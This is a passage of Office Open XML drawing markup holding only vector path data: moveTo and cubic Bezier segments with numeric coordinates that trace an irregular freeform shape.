                    <a:pt x="333" y="413"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="333" y="413"/>
                    <a:pt x="333" y="413"/>
                    <a:pt x="333" y="413"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="333" y="413"/>
                    <a:pt x="333" y="413"/>
                    <a:pt x="333" y="413"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="332" y="413"/>
                    <a:pt x="332" y="413"/>
                    <a:pt x="332" y="413"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="332" y="413"/>
                    <a:pt x="332" y="413"/>
                    <a:pt x="332" y="413"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="331" y="414"/>
                    <a:pt x="331" y="414"/>
                    <a:pt x="332" y="414"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="332" y="414"/>
                    <a:pt x="332" y="414"/>
                    <a:pt x="332" y="414"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="331" y="415"/>
                    <a:pt x="331" y="415"/>
                    <a:pt x="331" y="415"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="331" y="415"/>
                    <a:pt x="331" y="415"/>
                    <a:pt x="331" y="415"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="332" y="415"/>
                    <a:pt x="332" y="415"/>
                    <a:pt x="332" y="415"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="326" y="414"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="326" y="414"/>
                    <a:pt x="327" y="413"/>
                    <a:pt x="327" y="413"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="327" y="413"/>
                    <a:pt x="327" y="413"/>
                    <a:pt x="327" y="413"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="327" y="413"/>
                    <a:pt x="327" y="413"/>
                    <a:pt x="326" y="413"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="326" y="414"/>
                    <a:pt x="326" y="414"/>
                    <a:pt x="325" y="415"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="326" y="414"/>
                    <a:pt x="326" y="414"/>
                    <a:pt x="326" y="414"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="353" y="415"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="354" y="415"/>
                    <a:pt x="355" y="414"/>
                    <a:pt x="355" y="414"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="355" y="414"/>
                    <a:pt x="355" y="414"/>
                    <a:pt x="355" y="414"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="356" y="413"/>
                    <a:pt x="356" y="413"/>
                    <a:pt x="356" y="412"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="356" y="413"/>
                    <a:pt x="356" y="413"/>
                    <a:pt x="356" y="413"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="355" y="413"/>
                    <a:pt x="354" y="414"/>
                    <a:pt x="353" y="415"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="350" y="416"/>
                    <a:pt x="347" y="418"/>
                    <a:pt x="344" y="420"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="341" y="421"/>
                    <a:pt x="341" y="421"/>
                    <a:pt x="340" y="422"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="338" y="423"/>
                    <a:pt x="337" y="423"/>
                    <a:pt x="337" y="423"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="337" y="423"/>
                    <a:pt x="337" y="423"/>
                    <a:pt x="337" y="423"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="337" y="423"/>
                    <a:pt x="337" y="423"/>
                    <a:pt x="337" y="423"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="337" y="423"/>
                    <a:pt x="337" y="423"/>
                    <a:pt x="337" y="423"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="337" y="423"/>
                    <a:pt x="337" y="423"/>
                    <a:pt x="337" y="423"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="337" y="423"/>
                    <a:pt x="337" y="423"/>
                    <a:pt x="337" y="423"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="337" y="423"/>
                    <a:pt x="337" y="423"/>
                    <a:pt x="337" y="423"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="337" y="423"/>
                    <a:pt x="337" y="423"/>
                    <a:pt x="337" y="423"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="336" y="424"/>
                    <a:pt x="334" y="425"/>
                    <a:pt x="334" y="425"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="334" y="425"/>
                    <a:pt x="334" y="425"/>
                    <a:pt x="334" y="425"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="334" y="425"/>
                    <a:pt x="334" y="425"/>
                    <a:pt x="334" y="425"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="333" y="426"/>
                    <a:pt x="333" y="426"/>
                    <a:pt x="333" y="426"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="333" y="426"/>
                    <a:pt x="333" y="426"/>
                    <a:pt x="333" y="426"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="346" y="420"/>
                    <a:pt x="353" y="415"/>
                    <a:pt x="353" y="415"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="330" y="428"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="331" y="427"/>
                    <a:pt x="331" y="427"/>
                    <a:pt x="331" y="427"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="331" y="427"/>
                    <a:pt x="331" y="427"/>
                    <a:pt x="331" y="427"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="331" y="427"/>
                    <a:pt x="331" y="427"/>
                    <a:pt x="331" y="427"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="331" y="427"/>
                    <a:pt x="331" y="427"/>
                    <a:pt x="331" y="427"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="330" y="427"/>
                    <a:pt x="330" y="427"/>
                    <a:pt x="330" y="427"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="330" y="427"/>
                    <a:pt x="330" y="427"/>
                    <a:pt x="330" y="427"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="330" y="428"/>
                    <a:pt x="330" y="428"/>
                    <a:pt x="330" y="428"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="330" y="428"/>
                    <a:pt x="330" y="428"/>
                    <a:pt x="330" y="428"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="367" y="406"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="367" y="406"/>
                    <a:pt x="369" y="405"/>
                    <a:pt x="369" y="405"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="368" y="405"/>
                    <a:pt x="368" y="405"/>
                    <a:pt x="368" y="405"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="368" y="405"/>
                    <a:pt x="368" y="405"/>
                    <a:pt x="368" y="405"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="367" y="405"/>
                    <a:pt x="367" y="405"/>
                    <a:pt x="367" y="405"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="367" y="405"/>
                    <a:pt x="367" y="405"/>
                    <a:pt x="367" y="405"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="367" y="406"/>
                    <a:pt x="367" y="406"/>
                    <a:pt x="367" y="406"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="370" y="403"/>
                    <a:pt x="370" y="403"/>
                    <a:pt x="370" y="402"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="370" y="403"/>
                    <a:pt x="369" y="403"/>
                    <a:pt x="369" y="404"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="369" y="403"/>
                    <a:pt x="371" y="402"/>
                    <a:pt x="372" y="401"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="372" y="401"/>
                    <a:pt x="372" y="401"/>
                    <a:pt x="372" y="401"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="375" y="398"/>
                    <a:pt x="375" y="398"/>
                    <a:pt x="375" y="398"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="375" y="398"/>
                    <a:pt x="375" y="398"/>
                    <a:pt x="375" y="398"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="374" y="398"/>
                    <a:pt x="373" y="399"/>
                    <a:pt x="373" y="399"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="369" y="404"/>
                    <a:pt x="369" y="404"/>
                    <a:pt x="366" y="406"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="365" y="407"/>
                    <a:pt x="364" y="408"/>
                    <a:pt x="363" y="408"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="362" y="409"/>
                    <a:pt x="362" y="409"/>
                    <a:pt x="362" y="409"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="361" y="409"/>
                    <a:pt x="361" y="410"/>
                    <a:pt x="360" y="410"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="359" y="411"/>
                    <a:pt x="359" y="411"/>
                    <a:pt x="359" y="411"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="360" y="410"/>
                    <a:pt x="360" y="410"/>
                    <a:pt x="360" y="410"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="359" y="412"/>
                    <a:pt x="357" y="413"/>
                    <a:pt x="355" y="414"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="356" y="414"/>
                    <a:pt x="356" y="414"/>
                    <a:pt x="356" y="414"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="358" y="412"/>
                    <a:pt x="361" y="411"/>
                    <a:pt x="363" y="409"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="363" y="409"/>
                    <a:pt x="363" y="409"/>
                    <a:pt x="363" y="409"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="363" y="409"/>
                    <a:pt x="363" y="409"/>
                    <a:pt x="363" y="409"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="363" y="409"/>
                    <a:pt x="363" y="409"/>
                    <a:pt x="363" y="409"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="364" y="408"/>
                    <a:pt x="366" y="407"/>
                    <a:pt x="366" y="407"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="367" y="406"/>
                    <a:pt x="367" y="406"/>
                    <a:pt x="367" y="406"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="367" y="406"/>
                    <a:pt x="367" y="406"/>
                    <a:pt x="367" y="406"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="399" y="365"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="399" y="365"/>
                    <a:pt x="399" y="364"/>
                    <a:pt x="399" y="364"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="399" y="363"/>
                    <a:pt x="399" y="363"/>
                    <a:pt x="399" y="363"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="399" y="363"/>
                    <a:pt x="399" y="363"/>
                    <a:pt x="399" y="363"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="399" y="363"/>
                    <a:pt x="399" y="363"/>
                    <a:pt x="399" y="363"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="399" y="362"/>
                    <a:pt x="399" y="362"/>
                    <a:pt x="399" y="362"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="400" y="361"/>
                    <a:pt x="400" y="359"/>
                    <a:pt x="400" y="359"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="400" y="359"/>
                    <a:pt x="400" y="359"/>
                    <a:pt x="400" y="359"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="399" y="359"/>
                    <a:pt x="399" y="359"/>
                    <a:pt x="399" y="359"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="399" y="360"/>
                    <a:pt x="399" y="360"/>
                    <a:pt x="399" y="360"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="399" y="361"/>
                    <a:pt x="399" y="361"/>
                    <a:pt x="399" y="361"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="399" y="361"/>
                    <a:pt x="399" y="361"/>
                    <a:pt x="399" y="361"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="399" y="361"/>
                    <a:pt x="399" y="361"/>
                    <a:pt x="398" y="362"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="398" y="362"/>
                    <a:pt x="398" y="363"/>
                    <a:pt x="398" y="363"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="397" y="364"/>
                    <a:pt x="398" y="364"/>
                    <a:pt x="398" y="365"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="398" y="366"/>
                    <a:pt x="398" y="366"/>
                    <a:pt x="398" y="366"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="398" y="366"/>
                    <a:pt x="398" y="366"/>
                    <a:pt x="398" y="366"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="399" y="365"/>
                    <a:pt x="399" y="365"/>
                    <a:pt x="399" y="365"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="399" y="365"/>
                    <a:pt x="399" y="365"/>
                    <a:pt x="399" y="365"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="344" y="337"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="344" y="337"/>
                    <a:pt x="344" y="336"/>
                    <a:pt x="344" y="336"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="343" y="336"/>
                    <a:pt x="343" y="336"/>
                    <a:pt x="343" y="336"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="342" y="336"/>
                    <a:pt x="342" y="336"/>
                    <a:pt x="340" y="336"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="341" y="336"/>
                    <a:pt x="341" y="336"/>
                    <a:pt x="341" y="336"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="341" y="336"/>
                    <a:pt x="340" y="336"/>
                    <a:pt x="340" y="337"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="340" y="337"/>
                    <a:pt x="339" y="338"/>
                    <a:pt x="340" y="338"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="340" y="338"/>
                    <a:pt x="340" y="338"/>
                    <a:pt x="340" y="338"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="341" y="338"/>
                    <a:pt x="341" y="338"/>
                    <a:pt x="342" y="337"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="342" y="337"/>
                    <a:pt x="342" y="337"/>
                    <a:pt x="342" y="337"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="343" y="337"/>
                    <a:pt x="343" y="337"/>
                    <a:pt x="344" y="337"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="366" y="387"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="366" y="386"/>
                    <a:pt x="367" y="385"/>
                    <a:pt x="368" y="384"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="368" y="383"/>
                    <a:pt x="368" y="383"/>
                    <a:pt x="368" y="382"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="369" y="381"/>
                    <a:pt x="369" y="381"/>
                    <a:pt x="369" y="381"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="369" y="380"/>
                    <a:pt x="370" y="380"/>
                    <a:pt x="371" y="379"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="371" y="378"/>
                    <a:pt x="371" y="378"/>
                    <a:pt x="371" y="378"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="371" y="378"/>
                    <a:pt x="372" y="377"/>
                    <a:pt x="372" y="377"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="372" y="377"/>
                    <a:pt x="375" y="372"/>
                    <a:pt x="373" y="370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="373" y="370"/>
                    <a:pt x="373" y="370"/>
                    <a:pt x="373" y="370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="374" y="369"/>
                    <a:pt x="374" y="368"/>
                    <a:pt x="375" y="367"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="372" y="367"/>
                    <a:pt x="372" y="367"/>
                    <a:pt x="373" y="365"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="373" y="365"/>
                    <a:pt x="373" y="365"/>
                    <a:pt x="373" y="365"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="373" y="364"/>
                    <a:pt x="373" y="364"/>
                    <a:pt x="374" y="363"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="373" y="363"/>
                    <a:pt x="373" y="363"/>
                    <a:pt x="373" y="363"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="373" y="362"/>
                    <a:pt x="374" y="362"/>
                    <a:pt x="374" y="361"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="373" y="361"/>
                    <a:pt x="373" y="361"/>
                    <a:pt x="373" y="359"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="370" y="357"/>
                    <a:pt x="370" y="357"/>
                    <a:pt x="372" y="354"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="372" y="354"/>
                    <a:pt x="372" y="354"/>
                    <a:pt x="372" y="354"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="372" y="353"/>
                    <a:pt x="372" y="353"/>
                    <a:pt x="372" y="352"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="373" y="352"/>
                    <a:pt x="373" y="352"/>
                    <a:pt x="373" y="352"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="373" y="352"/>
                    <a:pt x="374" y="346"/>
                    <a:pt x="374" y="345"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="373" y="345"/>
                    <a:pt x="372" y="345"/>
                    <a:pt x="371" y="344"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="371" y="344"/>
                    <a:pt x="372" y="343"/>
                    <a:pt x="372" y="342"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="372" y="342"/>
                    <a:pt x="372" y="342"/>
                    <a:pt x="372" y="342"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="373" y="338"/>
                    <a:pt x="373" y="335"/>
                    <a:pt x="372" y="334"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="372" y="334"/>
                    <a:pt x="372" y="334"/>
                    <a:pt x="372" y="334"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="372" y="335"/>
                    <a:pt x="371" y="336"/>
                    <a:pt x="371" y="336"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="371" y="337"/>
                    <a:pt x="371" y="337"/>
                    <a:pt x="371" y="337"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="369" y="339"/>
                    <a:pt x="369" y="339"/>
                    <a:pt x="367" y="344"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="366" y="344"/>
                    <a:pt x="366" y="345"/>
                    <a:pt x="366" y="346"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="365" y="346"/>
                    <a:pt x="365" y="346"/>
                    <a:pt x="364" y="348"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="364" y="349"/>
                    <a:pt x="363" y="351"/>
                    <a:pt x="362" y="353"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="361" y="355"/>
                    <a:pt x="359" y="355"/>
                    <a:pt x="358" y="354"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="357" y="354"/>
                    <a:pt x="357" y="354"/>
                    <a:pt x="357" y="353"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="356" y="351"/>
                    <a:pt x="355" y="350"/>
                    <a:pt x="354" y="348"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="352" y="348"/>
                    <a:pt x="352" y="348"/>
                    <a:pt x="352" y="347"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="352" y="346"/>
                    <a:pt x="353" y="346"/>
                    <a:pt x="353" y="345"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="353" y="344"/>
                    <a:pt x="353" y="344"/>
                    <a:pt x="353" y="344"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="353" y="341"/>
                    <a:pt x="357" y="340"/>
                    <a:pt x="358" y="338"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="357" y="338"/>
                    <a:pt x="357" y="338"/>
                    <a:pt x="357" y="338"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="356" y="338"/>
                    <a:pt x="356" y="338"/>
                    <a:pt x="355" y="338"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="355" y="338"/>
                    <a:pt x="355" y="338"/>
                    <a:pt x="354" y="338"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="353" y="338"/>
                    <a:pt x="352" y="337"/>
                    <a:pt x="351" y="337"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="351" y="337"/>
                    <a:pt x="348" y="336"/>
                    <a:pt x="347" y="335"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="347" y="335"/>
                    <a:pt x="347" y="335"/>
                    <a:pt x="347" y="335"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="346" y="335"/>
                    <a:pt x="346" y="335"/>
                    <a:pt x="346" y="335"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="345" y="335"/>
                    <a:pt x="345" y="335"/>
                    <a:pt x="345" y="335"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="345" y="336"/>
                    <a:pt x="345" y="336"/>
                    <a:pt x="345" y="337"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="345" y="337"/>
                    <a:pt x="345" y="337"/>
                    <a:pt x="345" y="337"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="346" y="338"/>
                    <a:pt x="346" y="338"/>
                    <a:pt x="347" y="338"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="346" y="340"/>
                    <a:pt x="344" y="338"/>
                    <a:pt x="343" y="339"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="342" y="340"/>
                    <a:pt x="341" y="341"/>
                    <a:pt x="340" y="342"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="338" y="342"/>
                    <a:pt x="338" y="342"/>
                    <a:pt x="338" y="343"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="338" y="343"/>
                    <a:pt x="338" y="343"/>
                    <a:pt x="338" y="343"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="338" y="345"/>
                    <a:pt x="337" y="346"/>
                    <a:pt x="337" y="347"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="336" y="347"/>
                    <a:pt x="333" y="348"/>
                    <a:pt x="333" y="346"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="332" y="346"/>
                    <a:pt x="332" y="346"/>
                    <a:pt x="331" y="346"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="331" y="346"/>
                    <a:pt x="331" y="346"/>
                    <a:pt x="331" y="346"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="331" y="345"/>
                    <a:pt x="331" y="345"/>
                    <a:pt x="331" y="345"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="331" y="345"/>
                    <a:pt x="330" y="345"/>
                    <a:pt x="330" y="345"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="328" y="346"/>
                    <a:pt x="326" y="347"/>
                    <a:pt x="324" y="348"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="323" y="349"/>
                    <a:pt x="321" y="351"/>
                    <a:pt x="319" y="351"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="319" y="351"/>
                    <a:pt x="319" y="352"/>
                    <a:pt x="319" y="352"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="319" y="354"/>
                    <a:pt x="319" y="354"/>
                    <a:pt x="319" y="354"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="319" y="354"/>
                    <a:pt x="319" y="354"/>
                    <a:pt x="319" y="355"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="318" y="355"/>
                    <a:pt x="317" y="355"/>
                    <a:pt x="316" y="355"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="317" y="354"/>
                    <a:pt x="317" y="354"/>
                    <a:pt x="317" y="353"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="316" y="353"/>
                    <a:pt x="316" y="353"/>
                    <a:pt x="315" y="353"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="315" y="353"/>
                    <a:pt x="308" y="362"/>
                    <a:pt x="308" y="362"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="307" y="362"/>
                    <a:pt x="307" y="363"/>
                    <a:pt x="305" y="363"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="302" y="365"/>
                    <a:pt x="299" y="363"/>
                    <a:pt x="296" y="365"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="294" y="366"/>
                    <a:pt x="292" y="366"/>
                    <a:pt x="291" y="368"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="290" y="368"/>
                    <a:pt x="291" y="370"/>
                    <a:pt x="290" y="370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="289" y="370"/>
                    <a:pt x="289" y="370"/>
                    <a:pt x="287" y="370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="287" y="369"/>
                    <a:pt x="287" y="369"/>
                    <a:pt x="287" y="369"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="286" y="370"/>
                    <a:pt x="286" y="370"/>
                    <a:pt x="286" y="370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="286" y="371"/>
                    <a:pt x="286" y="371"/>
                    <a:pt x="286" y="371"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="286" y="371"/>
                    <a:pt x="285" y="371"/>
                    <a:pt x="285" y="371"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="285" y="372"/>
                    <a:pt x="285" y="372"/>
                    <a:pt x="285" y="373"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="285" y="374"/>
                    <a:pt x="285" y="374"/>
                    <a:pt x="285" y="374"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="284" y="375"/>
                    <a:pt x="283" y="375"/>
                    <a:pt x="285" y="380"/>
                  </a:cubicBezTo>
